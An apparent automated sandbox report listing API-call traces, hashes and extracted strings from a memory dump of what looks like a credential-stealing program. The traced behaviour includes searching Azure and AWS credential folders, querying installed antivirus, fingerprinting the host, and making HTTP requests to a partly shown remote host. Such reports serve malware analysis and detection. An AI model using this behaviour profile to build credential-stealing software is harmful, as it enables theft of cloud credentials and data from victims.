                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                        • _memset.LIBCMT ref: 00416556
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                        • _memset.LIBCMT ref: 004165CA
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                        • _memset.LIBCMT ref: 0041663E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                        • API String ID: 4216275855-974132213
                                                                                                        • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                        • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                        • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                        • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                        • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                        • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                        • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                        • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                        • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                        • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                        • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                        • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                        • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                        • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                        • String ID:
                                                                                                        • API String ID: 1956182324-0
                                                                                                        • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                        • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                        • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                        • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                          • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                          • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                          • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                          • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                          • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                          • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                          • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                          • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                          • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                          • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                          • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                          • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                          • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                          • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                          • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                          • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                          • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                          • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                          • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                        • String ID: .exe$.exe$_DEBUG.zip$cowod.$e90840a846d017e7b095f7543cdf2d15$hopto$http://$org
                                                                                                        • API String ID: 305159127-1328715557
                                                                                                        • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                        • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                        • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                        • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                        APIs
                                                                                                        • strtok_s.MSVCRT ref: 004135EA
                                                                                                        • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                        • strtok_s.MSVCRT ref: 0041398F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                        • String ID: false$true
                                                                                                        • API String ID: 2116072422-2658103896
                                                                                                        • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                        • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                        • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                        • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                        • String ID: GET$\xA
                                                                                                        • API String ID: 442264750-571280152
                                                                                                        • Opcode ID: 2ad8791629c2d56ec60ae4dae2b11095def752f5e47b2107ee72084c0c569f84
                                                                                                        • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                        • Opcode Fuzzy Hash: 2ad8791629c2d56ec60ae4dae2b11095def752f5e47b2107ee72084c0c569f84
                                                                                                        • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                        • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                        • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                          • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                          • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                        • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                        • API String ID: 4288110179-315474579
                                                                                                        • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                        • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                        • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                        • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004012A7
                                                                                                        • _memset.LIBCMT ref: 004012B6
                                                                                                        • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                        • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                        • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                        • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                        • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                        • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                        • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                        • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                        • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                        • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                        • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                        • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                        • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                          • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                          • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                          • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                        • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                        • String ID:
                                                                                                        • API String ID: 1553874529-0
                                                                                                        • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                        • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                        • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                        • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                        APIs
                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                        • wsprintfA.USER32 ref: 00410AA7
                                                                                                        • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                          • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                          • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                          • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                          • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                        • String ID: wA$:\$C$QuBi
                                                                                                        • API String ID: 1856320939-1441494722
                                                                                                        • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                        • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                        • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                        • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                        • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                        • wsprintfA.USER32 ref: 004112DD
                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
